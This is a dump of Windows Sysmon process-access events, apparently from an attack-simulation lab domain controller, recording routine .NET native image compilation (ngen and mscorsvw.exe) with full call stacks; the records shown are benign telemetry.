13:25:31.258{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464B-6000-B603-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:31.243{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-464B-6000-B603-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:31.243{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464B-6000-B603-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:31.180{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464B-6000-B503-000000009A01}4104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:31.165{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-464B-6000-B503-000000009A01}4104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:31.165{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464B-6000-B503-000000009A01}4104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.977{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464C-6000-C203-000000009A01}1172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.962{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-464C-6000-C203-000000009A01}1172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.962{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464C-6000-C203-000000009A01}1172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.883{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464C-6000-C103-000000009A01}4968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.868{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-464C-6000-C103-000000009A01}4968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.868{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464C-6000-C103-000000009A01}4968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.774{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464C-6000-C003-000000009A01}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.758{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-464C-6000-C003-000000009A01}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.758{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464C-6000-C003-000000009A01}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.696{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464C-6000-BF03-000000009A01}4016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.680{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-464C-6000-BF03-000000009A01}4016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.680{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464C-6000-BF03-000000009A01}4016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.633{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464C-6000-BE03-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.618{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-464C-6000-BE03-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.618{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464C-6000-BE03-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.555{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464C-6000-BD03-000000009A01}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.540{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-464C-6000-BD03-000000009A01}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.540{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464C-6000-BD03-000000009A01}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\F